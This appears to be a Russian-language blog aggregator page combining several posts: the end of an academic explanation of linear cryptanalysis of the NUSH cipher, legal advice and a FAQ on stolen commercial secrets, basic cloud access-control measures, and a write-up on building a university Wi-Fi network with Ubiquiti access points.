Следовательно a_{32}[0] b_{32}[0] c_{32}[0] d_{32}[0] зависит только отa_{32}[0] \oplus b_{32}[0] \oplus d_{32}[0]. А они в свою очередь выражаются через a_{34}[0], b_{34}[0], c_{34}[0], d_{34}[0] и через KR_{33}[0] . Прослеживая и дальше связь между промежуточными значениями получим, что a_{35}[0,1], b_{35}[0,1], c_{35}[0,1], d_{35}[0,1] зависят от a_{36}[0,1], b_{36}[0,1], c_{36}[0,1], d_{36}[0,1] и от KR_{35}[0] .

Резюмируя последние пару абзацев получим, что a_{32}[0] \oplus b_{32}[0] \oplus d_{32}[0] зависит от M_0[0,1] , M_1[0-2] , M_2[0,12] , M_3[0,1] , KF_0[0] , KF_1[0,12] , KF_2[0-2] , KF_3[0,1] , KR_{33}[0] , KR_{34}[0] , KR_{35}[0] , M_0[0,1] , M_1[0-2] . И эту зависимость можно выразить через функцию f_4:

a_{32}[0] \oplus b_{32}[0] \oplus d_{32}[0] = f_4 \begin{pmatrix} {M_0[0,1], M_1[0-2], M_2[0-12], M_3[0,1], \\ KF_0[0,1], KF_1[0-12], KF_2[0-2], KF_3[0,1], \\ KR_{33}[0], KR_{34}[0], KR_{35}[0] } \end{pmatrix} \quad (8)

А зависимость для a_{31}[0] \oplus b_{31}[0] \oplus d_{31}[0] можно записать через f_5 :

a_{31}[0] \oplus b_{31}[0] \oplus d_{31}[0] = f_5 \begin{pmatrix} {M_0[0-9], M_1[0-11], M_2[0-12], M_3[0,1], \\ KF_0[0,1], KF_1[0-12], KF_2[0-11], KF_3[0-9], \\ KR_{32}[0], KR_{33}[0], KR_{34}[0], KR_{35}[0-9] } \end{pmatrix} \quad (9)

Теперь перейдем непосредственно к линейному криптоанализу. Принимая во внимание (3) заметим, что 29-раундовая линейная апроксимация

a_2[0] \oplus b_2[0] \oplus d_2[0] = a_{31}[0] \oplus b_{31}[0] \oplus d_{31}[0] \quad (10)

содержит вероятность 1/2+2^{-30} согласно лемме Мацуи. Эта линейная апроксимация может быть записана через введенные ранее функции

{f_2(P, KS_0[0], KS_1[0-11], KS_2[0-11], KS_3[0-7], KR_1[0-7]) = \\ = f_5 \begin{pmatrix} {M, \\ KF_0[0,1], KF_1[0-12], KF_2[0-11], KF_3[0-9], \\ KR_{32}[0], KR_{33}[0], KR_{34}[0], KR_{35}[0-9] } \end{pmatrix}} { \space \\ \space \\ \quad (11)}

Из расписания ключей NUSH известно, что (11) содержит m_0 -бит ключа. Восстановим их по алгоритму, приведенному ниже.

Шаг 1. Для каждого кандидата в ключи K^i(i=1,...,2^{m_0}) через T_i обозначим кол-во открытых текстов, удовлетворяющих (11).

Шаг 2. Если T_j максимальное значение из всех T_i , тогда сохранить K^j .

Шаг 3. Остальные биты ключа ключа восстанавливаются, используя урезанную линейную апроксимацию раундов или методом исключения.

Вывод

В статье представлена основная концепция линейного криптоанализа и рассмотрен пример его применения в анализе алгоритма шифрования NUSH.

Литература

1. Mitsuru Matsui, Linear cryptoanalysis method for DES cipher, Advances in Cryptogy-Eurocrypt93, Berlin: Springer-Verlag, 1993, 386-397.

2. Wu Wenling & Feng Dengguo, Linear cryptoanalysis of NUSH block cipher, Science in China (Seria F), February 2002, Vol. 45, 1.

3. M. Heys, A Tutorial on Linear and Differential Cryptoanalysis, Cryptologia, June 2001, Vol. 26 3.

4. https://www.youtube.com/watch?v=nEHVfeaPjNw

Подробнее..

Что делать если украли коммерческую тайну

09.02.2021 18:11:49 | Автор: admin

Сколько бы вы ни защищались, что бы ни делали, на 100% гарантировать защиту информации невозможно. Во-первых, что-то вы можете не предусмотреть с точки зрения законодательства, технических или организационных решений. Во-вторых, иногда люди, имеющие доступ к коммерческой тайне, поступают вопреки закону и здравому смыслу из корыстных или каких-либо других побуждений. И тогда возникает необходимость обратиться в суда, а в некоторых случаях в полицию для осуществления уголовного производства.

Досудебное урегулирование

Конечно, лучший выход это разрешить ситуацию в досудебном порядке. Если ситуация позволяет, такой вариант позволит сэкономить время и деньги, которые иначе понадобятся на оплату работы адвокатов и другие судебные издержки. Кроме того, досудебное решение гарантирует резульсудебное разбирательство совсем не обязательно решится в вашу пользу.

Потому крайне важно правильно подготовиться к суду, собрать все необходимые доказательства и правильно оформить документы. От того, насколько убедительными будут ваши доказательства, во многом зависит, дойдет ли дело до суда вообще, и, если дойдет, насколько вероятным будет решение в вашу пользу.

Помните золотое правило при обращении в суд: Прав оказывается не тот, за кем истина, а тот, кто лучше подготовил документы и доказательства. Это правило знают все, кто хоть раз в жизни обращался суд общей юрисдикции или арбитражный суд для разрешения споров. К сожалению, о нем нередко забывают, а потом искренне недоумевают, почему явный злоумышленник оказывается полностью оправданным.

Какая информация может считаться доказательствами

Первое, что нужно обязательно предоставить суду, это документы, подтверждающие, что похищенная информация была защищена режимом коммерческой тайны, и что сотрудник был об этом оповещен. Это могут быть какие-то реестры, соглашение о неразглашении и другие подобные документы с подписью сотрудника.

Далее следует доказать факт хищения. Здесь подойдут самые разные сведения:

  1. Скриншоты или логи программы-шпиона, которая отслеживает действия сотрудников при работе за компьютером.

  2. Логи операционной системы, также подтверждающие определенные действия.

  3. Отправленные электронные письма.

  4. Видеозаписи с камер слежения и т.д.

Также в качестве доказательств подойдут показания свидетелей. Их обязательно нужно задокументировать, т.е. записать на бумаге и получить подпись человека, который предоставил соответствующие сведения.

Суд или заявление в полицию

Выбор метода наказания зависит от тяжести последствий хищения информации. Если в результате пострадали третьи лица, например, клиенты компании, или сама организация понесла крупный финансовый ущерб, стоит написать заявление в полицию и приложить все собранные вами доказательства. В этом случае злоумышленнику грозит уголовная статья, крупный штраф, исправительные работы или даже лишение свободы.

УК РФ Статья 183. Незаконные получение и разглашение сведений, составляющих коммерческую, налоговую или банковскую тайну

(в ред. Федерального закона от 07.08.2001 N 121-ФЗ)

(см. текст в предыдущей редакции)

1. Собирание сведений, составляющих коммерческую, налоговую или банковскую тайну, путем похищения документов, подкупа или угроз, а равно иным незаконным способом -

наказывается штрафом в размере до пятисот тысяч рублей или в размере заработной платы или иного доход, осужденного за период до одного года, либо исправительными работами на срок до одного года, либо принудительными работами на срок до двух лет, либо лишением свободы на тот же срок.

(в ред. Федеральных законов от 07.12.2011 N 420-ФЗ, от 29.06.2015 N 193-ФЗ)

2. Незаконные разглашение или использование сведений, составляющих коммерческую, налоговую или банковскую тайну, без согласия их владельца лицом, которому она была доверена или стала известна по службе или работе, -

наказываются штрафом в размере до одного миллиона рублей или в размере заработной платы или иного дохода осужденного за период до двух лет с лишением права занимать определенные должности или заниматься определенной деятельностью на срок до трех лет, либо исправительными работами на срок до двух лет, либо принудительными работами на срок до трех лет, либо лишением свободы на тот же срок.

(в ред. Федеральных законов от 07.12.2011 N 420-ФЗ, от 29.06.2015 N 193-ФЗ)

3. Те же деяния, причинившие крупный ущерб или совершенные из корыстной заинтересованности, -

наказываются штрафом в размере до одного миллиона пятисот тысяч рублей или в размере заработной платы или иного дохода осужденного за период до трех лет с лишением права занимать определенные должности или заниматься определенной деятельностью на срок до трех лет, либо принудительными работами на срок до пяти лет, либо лишением свободы на тот же срок.

(в ред. Федеральных законов от 07.12.2011 N 420-ФЗ, от 29.06.2015 N 193-ФЗ)

4. Деяния, предусмотренные частями второй или третьей настоящей статьи, повлекшие тяжкие последствия, -

наказываются принудительными работами на срок до пяти лет либо лишением свободы на срок до семи лет.

(в ред. Федерального закона от 07.12.2011 N 420-ФЗ)

Если ситуация не столь критичная, имеет смысл попробовать достичь досудебного согласия или обращаться в хозяйственный суд.

Судебное разбирательство: сроки и особенности

Иски о взыскании убытков при нарушении коммерческой тайны подаются в арбитражный суд, и с точки зрения процедуры ничем не отличаются от любых других споров. Также необходимо подать иск, приложить все документальные доказательства своей правоты, оплатить судебный сбор и т.д.

Длительность судебного разбирательства может варьироваться от 3-4 месяцев до нескольких лет. Вести такое дело имеет право любой юрист, изучавший хозяйственное право, в том числе, штатный юрист-консультант компании. Но если вы хотите добиться положительного результата, лучше обратиться к специалисту с опытом в подобных вопросах.

Какую помощь оказывает юрист

Помимо непосредственно представления ваших интересов в суде, юрист должен правильно составить исковое заявление и помочь подготовить доказательную базу. Практика показывает, что без глубокого изучения сферы защиты информации с последним пунктом нередко возникают сложности.

Чаще всего люди, не имеющие глубоких технических знаний в сфере IT, просто не догадываются, где искать доказательства, особенно, если это какие-то технически сведения из системных файлов и тому подобные данные. В то же время IT-специалисты компании прекрасно о них осведомлены, но не знают, каким образом оформить столь специфические сведения в качестве доказательств для суда.

Опытный специалист поможет найти подтверждение вашей правоты даже там, где вы б никогда не додумались искать. Именно потому за юридической помощью лучше обращаться к профессионалу с опытом судебных споров по вопросам хищения информации, защищенной коммерческой тайны.

Проще всего работать с информацией на бумажных носителях. Здесь и доступ ограничить намного проще, и круг потенциальных виновных всегда небольшой, и опыт в работе с этим типом информации огромен.

Копирование информации с цифровых носителей доказать сложнее. Потому крайне важно заранее заботиться о защите данных не только на уровне документов, но и различными техническими средствами.

Что делать, если суд принял решение не в вашу пользу

Практика показывает, что даже с помощью самого лучшего юриста далеко не всегда удается доказать вину сотрудника в суде. В некоторых случаях причиной становится недостаточное внимание к документам на этапе введения в организации режима коммерческой тайны, в других, например, если сотрудник подсмотрел сведения с чужого экрана, суд может прийти к выводу, что само руководство компании уделяло недостаточное внимание защите информации. Причин может быть много. Практика показывает, что выиграть такой суд удается менее чем в половине случаев.

Но даже если вы проиграли, не отчаивайтесь. Изучите свои ошибки, постарайтесь исправить ситуацию так, чтобы в будущем подобные хищения стали невозможны или крайне сложны. Кроме того, обязательно оповестите о факте хищения данных своих клиентов и партнеров, которых может затронуть сложившаяся ситуация. Это поможет им защититься от возможных недобросовестных действий, уже направленных против них.

Но не стоит заниматься рассылкой по всем контрагентам информации о недобросовестном сотруднике, также нет смысла распространять подобную информацию через сайт или в социальных сетях. Соблазн поступить подобным образом возникает у многих.

Известен не один случай, когда после подобных рассылок недобросовестный сотрудник, пользуясь тем, что доказал свою невиновность в суде, устраивался без проблем на новую работу. А компания подобными действиями зарабатывала себе репутацию скандальных и склочных людей, которые очерняют хороших специалистов просто из чувства мести.

Никогда не забывайте о том, что деньги любят тишину. Потому все сложности стоит воспринимать максимально спокойно, проблемы решать, а оповещать всех вокруг о своих ошибках и промахах, в том числе, о том, что у вас могут похитить ценную информацию, абсолютно излишне. Делайте свое дело, учитесь на ошибках, пользуйтесь помощью профессионалов.

Защитите информацию правильно, и даже в случае нарушений, вы сможете доказать свою правоту.

Подробнее..

Коммерческая таина. Частые вопросы и ответы

18.02.2021 20:14:00 | Автор: admin

Коммерческая тайна вызывает множество вопросов. Некоторые из них мы уже разбирали в прошлых публикациях. Другие регулярно повторяются в комментариях и письмах наших читателей. Потому было принято решение написать отдельную статью, где собраны наиболее частые вопросы и ответы к ним.

Если вы хотите узнать больше о коммерческой тайне, читайте прошлые публикации, посвященные этой тематике.

Может ли считаться коммерческой тайной любая информация, которую мы назвали коммерческой тайной?

Нет. Коммерческой тайной нельзя называть сведения, которые в соответствии с законодательством РФ не могут относиться к коммерческой тайне.

Например, некоторые компании при помощи коммерческой тайны засекречивают сумму заработной платы сотрудника или другую информацию, которая по закону считается публичной и/или не может быть защищена коммерческой тайной. Конечно, внутренний документ компании может определять, как коммерческую тайну все, что угодно. Но в случае разглашения подобной информации компания не сможет доказать в суде неправомерность действий сотрудника.

Как определить, какая информация считается коммерческой тайной?

Каждая организация самостоятельно составляет четкий и однозначный список типов информации, которую закрывают коммерческой тайной. Это могут быть любые данные и сведения, кроме тех, которые в соответствии с законом не могут быть защищены коммерческой тайной.

Сотрудники знакомятся с этим перечнем, подписывают обязательство о неразглашении. В результате каждый сотрудник компании четко знает, какую информацию недопустимо разглашать или использовать в личных целях. Ответственность за нарушение также фиксируется в документе о неразглашении. Только при наличии такого документа можно доказать в суде факт злоупотребления.

Относится ли к коммерческой тайне только та информация, которая находится на бумажных носителях?

Вопрос также популярный, так как бытует ошибочное мнение, что только если информация написана от руки или распечатана, ее можно защитить коммерческой тайной. Люди думают, что если информация находится на информационном носителе, жестком диске или флешке, то ее любой может скопировать, значит, о коммерческой тайне речь идти не может.

Это действительно ошибка. Мы живем в XXI веке, огромные объемы информации хранятся в цифровом виде. Потому защитить коммерческой тайной можно не только информацию на бумаге, но и на любом цифровом носителе, за который сотрудник несет ответственность в соответствии с внутренними инструкциями компании или согласно закону.

Частоли злоупотребляют коммерческой тайной?

Практика показывает, что процент злоупотреблений в этой сфере небольшой, но только в том случае, если компания своевременно озаботилась вопросами введения режима коммерческой тайны. В большинстве случаев уносят с собой клиентскую базу сотрудник, который считает, что ему слишком мало платят, или обидели как-то иначе. Например, обошли при назначении на руководящую должность. Также база клиентов нужна людям, которые планируют самостоятельно открыть бизнес в той же сфере либо это интересно их родным, друзьям, знакомым.

Если базу данных уже украли, может ли компания что-то сделать?

Можно, этой теме была посвящена целая статья Что делать если украли коммерческую тайну. Если говорить кратко, компания может уволить сотрудника по статье, подать заявление в полицию, если хищение коммерческой тайны становится частью уголовного преступления, например, мошеннических действий. Можно защитить свои права в суде. Но в этом случае материальную компенсацию в сопоставимых размерах удается получить только от юридических лиц.

Потому самое главное, своевременно позаботиться о защите коммерческой тайны, чтобы максимально снизить вероятность хищения, а наказание виновных вопрос вторичный.

Реально ли бороться с этим видом злоупотреблений?

Существует множество методов борьбы с утечкой ценной информации. В первую очередь, это технические методы, т.е. надежные пароли, защита серверов, другие варианты ограничения доступа к информации. Но на самом деле, важнее всего, предупредить проблему организационными методами. Человек должен четко понимать, какие виды информации недопустимо выносить из компании и чем это ему грозит. Потому крайне важно убедиться, что каждый сотрудник ознакомлен с соответствующими документами и четко понимает все, что прочитал и подписал.

В этом случае срабатывает тот же принцип, что и с соблюдением законов в государстве. Люди понимают, что законы нарушать нельзя, что за это в том или ином виде им грозит ответственность. Потому большинство граждан любой страны соблюдают законодательство. Также происходит и с коммерческой тайной. Если сотрудник понимает, что наказание будет серьезным, что это может быть штраф, потеря репутации, невозможность в будущем найти подобную работу, а в некоторых случаях даже уголовная ответственность, скорей всего, он хорошо подумает, стоит ли сиюминутная выгода нарушения обязательств.

Подробнее..

Информационная безопасность и коммерческая тайна

20.02.2021 14:06:35 | Автор: admin

В прошлых публикациях мы уже не один раз изучали вопрос, что такое коммерческая тайна, как ее защищать и многие другие нюансы, связанные с этим понятием. В этой статье поговорим о том, что именно охраняет коммерческая тайна, т.е. об информации.

Информация, защищенная коммерческой тайной, может храниться на различных носителях, бумажных или цифровых.

Цифровыми называют любые виды носителей информации, в которых данные хранятся в цифровом виде. Это может быть флешка, жесткий диск на компьютере, облачное хранилище, т.е. тот же жесткий диск, но уже на сервере и т.д.

Т.е. любой документ или набор данных, например, договор с поставщиком или клиентом, цены, зафиксированные для разных категорий клиентов в соответствии с системой скидок или любая другая информация может быть зафиксирована на бумаге и/или иметь цифровую копию, т.е. храниться в виде файла.

Важно: коммерческой тайной можно и нужно защищать не только информацию на бумажных носителях, но и любые данные, хранящиеся на цифровых носителях.

И здесь мы подходим к такому понятию, как цифровая информационная безопасность. Т.е. поговорим о том, как защитить ту часть информации, которая хранится не в физическом виде, а на каких-то цифровых носителях.

Типы носителей и разные подходы к защите информации

Такие носители могут иметь два варианта расположения:

  1. В офисе или на территории компании. Это жесткие диски, установленные на компьютерах пользователей или серверах, расположенных в помещениях, доступных сотрудникам компании, служебные флеш-носители и пр.

  2. В облаке, т.е. информация хранится удаленно на серверах провайдера.

В первом случае сам физический носитель находится в прямом доступе, потому и защитить его сравнительно просто. Если это флешка, достаточно не подключать ее в чужие компьютеры. Если это локальная сеть без доступа к интернету, информация вообще не выйдет за пределы компании, кроме как по вине сотрудников. Если это локальная сеть с выходом в Интернет, его можно ограничить, а в критической ситуации просто выключить сервер.

Т.е. в случае необходимости защитить коммерческую тайну можно при помощи ограничения физического доступа, так же, как и при работе с бумажными документами.

Во втором случае речь идет об информации, которая хранится в облаке. Чаще всего, это базы данных CRM, ERP, учетных систем, которые находятся на серверах провайдера услуг, а компания получает к этим инструментам только удаленный доступ.

К этим данным вы не сможете ограничить доступ физически. Администратор провайдера не отключит сервер от сети по вашему звонку или запросу.

В этом случае используют два метода защиты информации и, соответственно, коммерческой тайны.

1. Настройка прав доступа в системе

В этом случае вы определяете, к каким модулям системы и данным получает доступ тот или иной сотрудник. Т.е. разные сотрудники имеют доступ только к тем сведениям и возможностям, которые нужны им для работы. Для этого прописываются, так называемые роли. А каждый сотрудник получает собственный логин и пароль.

Соответственно, пользователь сможет работать с определенным набором данных. Что-либо другое узнать или воспользоваться дополнительными возможностями, например, скачать базу данных, он не сможет.

Здесь защита строится просто:

  1. Ограничивается перечень людей, которые имеют доступ к системе.

  2. Прописываются роли, т.е. каждый сотрудник работает только с тем, что ему действительно нужно, и не видит ничего лишнего.

  3. Каждый аккаунт пользователя защищается уникальным логином и паролем с достаточной степенью сложности.

Дополнительно возможно подключение двухфакторной идентификации, т.е. вход через последовательность пароля и одноразового кода из смс или других подобных вариантов защиты.

2. Доступ к системе с ограничением по IP

Этот метод используется как дополнение к мерам защиты, описанным выше. Т.е. вы также устанавливаете права пользователей, пароли, при желании, двухфакторную идентификацию. Но дополнительно разрешаете вход в систему только с определенных IP-адресов.

Широко известно, что каждый компьютер, который выходит в локальную или глобальную сеть, имеет свой IP-адрес. Этот набор цифр может быть постоянным или меняться при каждом подключении.

Чтобы защитить доступ к системе через ограничение IP, необходимо:

  1. Убедиться, что ваше интернет-подключение имеет статический IP, т.е. при каждом подключении к глобальной сети вам присваивают один и тот же адрес. Эту информацию может предоставить провайдер интернета вместе с пояснениями, что нужно сделать для получения статического адреса. Обычно для этого достаточно просто оплатить подходящий тариф. Большинство коммерческих организаций пользуются именно таким типом подключения уже давно. Но если есть сомнения, проверить не помешает.

  2. Установить на компьютерах сотрудников постоянные (статичные) IP. В локальной сети это выполняет системный администратор, при организации удаленных рабочих мест понадобится обратиться к Интернет-провайдеру (см. п. 1).

  3. В административном разделе системы указать список IP-адресов, с которых разрешен вход.

После этого войти в систему смогут только люди, имеющие соответствующую пару логин-пароль, и работающие с компьютера, IP-адрес которого вы внести в список.

Такие простые действия помогут обеспечить вашу информационную безопасность и, соответственно, защитить коммерческую тайну в случае работы с цифровыми носителями. Помните, что информацию нужно защищать до того, как утечка данных произойдет. После вы, возможно, сумеете наказать виновных, но избежать потерь, увы, не получится. Потому совмещайте организационные методы защиты коммерческой тайны и техническим обеспечением информационной безопасности.

Подробнее..

Recovery mode Фишинг и с чем его едят

18.03.2021 20:06:33 | Автор: admin

Почти каждый из нас слышал это страшное слово, но далеко не каждый понимает, что же это такое

Подробнее..

Разработка кибер-безопасной информационно-технической системы высшего учебного заведения

23.03.2021 00:21:32 | Автор: admin

От автора

В данной статье рассмотрены проектирование, тестирование, разработка и внедрение кибер-безопасной информационно-технической системы высшего учебного заведения на примере моего личного, в итоге успешного опыта внедрения в Университет таможенного дела и финансов в 2019 году. Результаты могут быть применены на любом этапе создания кибер-безопасных информационно-технических систем, в том числе высшие учебные заведения, корпоративные/домашние сети и прочее.

Отвечу на все интересующие Вас вопросы в комментариях, или личных сообщениях. Я открыт к дополнениям, оптимизации, а также критике со стороны профессионалов. Приятного ознакомления!

Введение

Развитие новых видов связи, быстрое совершенствование информационно-телекоммуникационных технологий и методов обработки данных радикально меняет облик современного образования. Во всём Мире эти тенденции, наиболее четко прослеживаются на примере дистанционного обучения (ДО) в период карантина, связанного с Коронавирусом.

Еще совсем недавно Высшие учебные заведения стран при организации ДО и совместного использования необходимого дистанционной связи были лишены возможности применения традиционных технологий и сетей радиорелейных линий с ретрансляторами (единственного на то время надёжного способа передачи информации), расположенными вне населенных пунктов из-за очевидной сложности технического и экономического характера. Одним словом, из-за дороговизны технической реализации ДО.

Однако, в настоящее время, прогресс в области развития цифровых методов, компьютерных и телекоммуникационных систем и сетей позволяет серьёзным образом изменить вид действующих и будущих образовательных технологий образования в целом. По моему мнению, развитие системы современного образования в стране непосредственно связан с наличием на местах скоростных каналов связи, позволяющих обеспечивать не только локальное, но и отдаленное обучение с учетом необходимых консультаций и непосредственно необходимых для обучения демонстраций, например, через Zoom , Skype, Discord конференции, реализуя доступ к современным базам данных и используя при необходимости методы распределенной обработки данных типа ODP (Open Distributed Processing, ITU - T Rec. X.901 / ISO / IEC 10746 - 1, ITU - T Rec. X. 902 / ISO / IEC 10746 - 2 ITU - T Rec. X.904 / ISO 10746 - 4 и некоторые другие).

Более того, идея унификации беспроводной связи для всех видов сервиса привела к появлению стандартов для мобильных сетей сначала третьего поколения (3G), а в дальнейшем 4G и 5G. Так, основной целью стандартов 3G было объединение телефонной и цифровой связи в глобальных сетях мобильной связи. Основными стандартами были UMTS (W-CDMA) и CDMA-2000. Основное отличие сетей четвертого поколения от предыдущего заключается в том, что технология 4G полностью основана на протоколах пакетной передачи данных. В плане развития концепции 4G и как дальнейшее развитие серии стандартов 802.11, реализуется стандарт 802.16 (Wireless Man), который находит не только промышленное, но и коммерческое применение. Обладая большим количеством неоспоримых преимуществ, он, как и многие другие подобные решения, может находить применение только находясь относительно близко от магистральных сетей, а и реализуется путем создания сетей, имеющих локальное покрытие. При этом, необходимо отметить, что переход в более коротковолновые диапазоны, связанные с относительно большим влиянием атмосферных условий на распространение радиоволн, исследованным до настоящего времени достаточно хорошо. Однако, для известных флуктуаций атмосферных и погодных параметров соответствующие изменения параметров прохождения сигнала хотя и могут быть легко прогнозируемые, но, как показывает практика, они (наземные устройства связи) все равно оказываются, более уязвимыми по отношению к закрытым (локальных сетей внутреннего пользования) к воздействию различных природных катаклизмов, и это необходимо принимать во внимание. Аналогичная тенденция прослеживается и при реализации возможностей и работы по выделенным каналам Интернет, хотя, для обоих случаев обеспечивается защищенность канала передачи данных. При этом, как правило, проявляется растущая тенденция, связанная с дефицитом пропускной способности образовательных трафиков национального спутникового ресурса, что в конечном итоге приводит и к его удорожанию.

Итак, чётко прослеживается принципиальная необходимость решения проблемы ДО конкретного вуза посредством использования внутренних информационных ресурсов в виде электронных учебников, конспектов лекций, виртуальных лабораторных работ и других методических разработок в виде единого банка хранения всей информации при использовании своей локальной технической системы обработки и доставки информации. Последний, (в отсутствии необходимости ведения бумажного архива), должен быть защищенным и доступным в любой момент времени, как для студентов, так и для специалистов ВУЗа, способствуя повышению их профессионального уровня. При этом очевидно, что любое ДО не может обходиться без технических средств его обеспечения.

Таким образом, передо мной была поставлена задача разработки кибер-безопасной информационно-технической системы (ИТС) для главного корпуса Университета таможенного дела и финансов с целью дальнейшего её использования в качестве ДО. Причем, при реализации поставленной задачи, нужно было ознакомиться с особенностями ДО и с современным состоянием и построением защитных информационно-технических систем.

Техническая реализация

Этот раздел тесно связан с актуальностью проблематики обеспечения безопасности использования глобальной сети интернет, что очевидна для большинства пользователей и требует на каждом этапе приема-передачи и обработки сопутствующих потоков не только априорной оценки угроз и рисков, а также разработки и реализации надёжных систем защиты с целью уменьшения отрицательного влияния на достоверность и целостность информации.

В этом аспекте, прежде всего, весомый вклад вносят точки входа (доступа), обеспечивая способы подключения к сети интернет. Так, при подключении к таким точкам, человек начинает передавать данные.

Эти данные очень легко перехватить, изменить и передать совершенно другую информацию, либо же злоумышленник может получить конфиденциальное сообщение, контактную и личную информацию, которые передаёт пользователь сети.

Итак, нужно понимать, что при подключен ни к глобальной сети - открывается двухканальная связь с помощью которой можно, как отправлять данные, так их и получать. Это говорит нам о том, что каждый пользователь может подключиться к любому ресурсу, а злоумышленник может подключиться к нему, что приводит к нежелательным последствиям.

Поэтому такие точки доступа к сети интернет не могут быть полностью безопасны. Злоумышленники могут перехватывать данные, подменять их и получать доступ к вашему цифровому устройству, что ведёт к риску так называемой компрометации данных и информации. Нам же нужно максимально минимизировать все риски.

Особенности реализации информационно-технической системы в Университете таможенного дела и финансов

Все, даже безупречные современные устройства, требуют решения по оптимизации его использования, прежде всего, при так называемой привязке к непосредственному объекту внедрения ИТС. А так как мы используем Мировую(Глобальную) цифровую информацию обеспечения в ВУЗе, то нас интересует как быстро эту информацию можно найти и как в целостном режиме передать непосредственно пользователю используя локальную систему связи университета. Привязка нашей системы имеет свои особенности связаны с расположением учебных корпусов вуза. В нашем случае можно было ожидать , что используется как эфирная среда распространения электромагнитных волн для передачи/приёма сообщений (Wi-Fi), так и кабельная система (витая пара, 4 пары, RG - 45, изображена на рис 1.1 ниже) и оптическая линия по стандарту GPON.

Необходимо было предусмотреть перекрытия так называемых теневых зон средств приёма/передачи сигналов используя стандартные системы Wi-Fi обеспечения. В связи с этим, мы должны использовать такие тактические данные устройств, что смогут обеспечить непрерывную зону покрытия главного корпуса в УТДФ, который представляет собой П - образное здание . (Рис. 1.2 - 1.3, фото со спутника, и схематическое отображение Google Maps ниже).

В связи с этой особенностью мы ожидаем, что нам придётся использовать различные системы связи и устройства. Для того , чтобы не ошибиться, нам нужно было провести апробацию этой системы и устройств на уровне одной кафедры, используя лабораторное макетирование (стенд) .

На данный момент один из самых распространенных способов подключения к сети интернет реализуют с помощью технологии Wireless Fidelity (Wi-Fi), которая имеет удобный и быстрый способ соединения, используя беспроводной радио-частотный канал.

Апробация информационно-технической системы

Для тестирования системы на кафедре кибербезопасности УТДФ все компоненты сети были соединены, и сформировали стенд для апробации (схема подключения изображена на рис 1.4 ниже).

Особое внимание было уделено привязке точек доступа, реализованные с помощью оборудования Ubiquiti UniFi. Внешний вид точек доступа приведены ниже на рис. 1.5 1.6.

Эти точки доступа передают сигнал также с помощью радио - частотного канала той же сверхвысокой частоты и в них реализована технология бесшовного покрытия. Эта технология позволяет не подключаться постоянно вручную к каждой новой точке доступа, а, наоборот, оптимизировать режим связи в автоматическом режиме. Так, если Вы выходите из зоны покрытия сигнала первой точки, то в автоматическом режиме Вы подключаетесь к следующей ближайшей точки сети с минимальной задержкой (рис. 1.7 - 1.8)

Для нормального функционирования и оптимизации работы точек доступа были проведены контрольные замеры мощности сигнала точек доступа, с целью выявления "мёртвых зон" и дальнейшего выбора оптимального расположения точек доступа для обеспечения "бесшовной сети" на всех четырёх этажах учебного корпуса.

Для решения этой задачи мы использовали закрытое серверное помещение межкафедральной информационно-технической лаборатории, надёжное хранилище от посторонних людей, куда мы перенесли все устройства и начали отрабатывать возможность подключения абонентов и трансляции Интернет трафика. Для стендирования были использованы устройства Ubiquiti Uni-Fi AP так как передача происходила на относительно коротких дистанциях (до 15 метров). В качестве Интернет-трафика использовалась ветвь УТДФ, к которой был подключен главный сервер лаборатории и маршрутизировали трафик с помощью витой пары и RG - 45. Для подключения экосистемы Ubiquiti мы использовали фирменное компактное серверное решение Ubiquiti Cloud, с помощью которого смогли настроить маршрутизацию трафика, его мониторинг (не нарушая конфиденциальность абонентов), обслуживания и создания резервных копий системы (Backup). После настройки и подключения мы воспользовались программным обеспечением, которое показывает уровень сигнала каждой точки доступа, и настроили режим ретрансляции, то есть фактически создали такое бесшовное покрытие, что могло усиливать и ретранслировать сигнал на вcе дополнительное крыло главного корпуса УТДФ.

Так, на базе кафедры кибербезопасности и информационных технологий в кабинете межкафедральной учебной лаборатории УТДФ был создан прототип системы , включающий в себя две точки доступа, который отлично работал в тестовом режиме всю рабочую неделю, обслуживая коллектив и студентов кафедры кибербезопасности и информационных технологий, кафедра компьютерных наук, межкафедральную информационно-техническую учебную лабораторию, и другие аудитории в радиусе действия.

То есть, после тестирования стендовой системы мы получили положительный результат, система показала свою работоспособность и зарекомендовала себя как систему, которую можно масштабировать на весь главный корпус УТДФ . Однако, для этого нужно разработать способ распространения стабильного покрытия на весь П - образный корпус.

Масштабирование, защита и внедрение информационно-технической системы

Благодаря успешному тестированию точек доступа нам удалось рассчитать примерную дальность Wi-Fi покрытия с учётом бетонированных стен здания - от 10 до 15 метров в зависимости от количества стен. Однако, корпус не является симметричным, то есть, расположив точки доступа слишком близко мы создадим искусственные электромагнитные наводки на систему, которые имеют диструктивное влияние на информационно-техническую систему вобщем. Для решения этой задачи мы взяли второй тип точек доступа Ubiquiti Unifi Long Range (с англ. Дальней дальности) , тем самым минимизировали скопления большого количества точек доступа благодаря установленным одной точки далекой дальности для длинных коридоров, и отдельную для актового зала так как это помещение является крупнейшим в здании. Имея эти данные мы сделали набросок схемы покрытия здания УМСФ и смогли рассчитать условное месторасположение каждой "точки доступа". Ниже, на рис. 1.9 зелёным выделены точки LR, синим - AP на каждом из 4 этажей корпуса (набросок рисовали в Paint, перфекционисты - извините :)

Кафедральная, а затем и университетская Wi-Fi система способна работать в СВЧ диапазоне (именно на частотах 2,4ГГц и 5ГГц), поддерживая 802.11 a / b / g / n Стандарты Wi-Fi. При этом следует отметить широкий выбор возможных скоростей обмена сообщениями (от 6,5 до 450 Мбит / с на частоте 2,4 ГГц и от 6,5 до 300 Мбит / с на частоте 5ГГц, используя соответственно стандарты 802.11n MSC0 - MSC23 и MSC0 - MSC15).

В нашей системе беспроводное сетевое соединение реализовано с помощью технологи Power over Ethernet (PoE). Технология PoE реализует в себе использование одного кабеля витой пары для передачи данных, а также питания периферийных устройств. Для передачи напряжения чаще всего используют неиспользованные (свободные) для передачи данных пары проводов, в нашем случае это синяя и коричневая (рис. 1.10).

В нашем случае было внедрено использование пар для передачи питания и пара для данных, то есть стандарты PoE, которые обеспечивают сигнализацию между оборудованием источника питания (power sourcing equipment) и устройством питания. Для корректной работы требуется PoE адаптер, фото которого ниже на рис 1.11.

Защита информационно-технической системы

Для эффективного регулирования кибер-отношений мы должны изучать не то состояние, которое сейчас существует, а прогнозировать и моделировать те кибер-отношения элементов структуры, которые возможны будут в будущем, и формировать механизм управления рисков, исходя из будущего состояния системы.

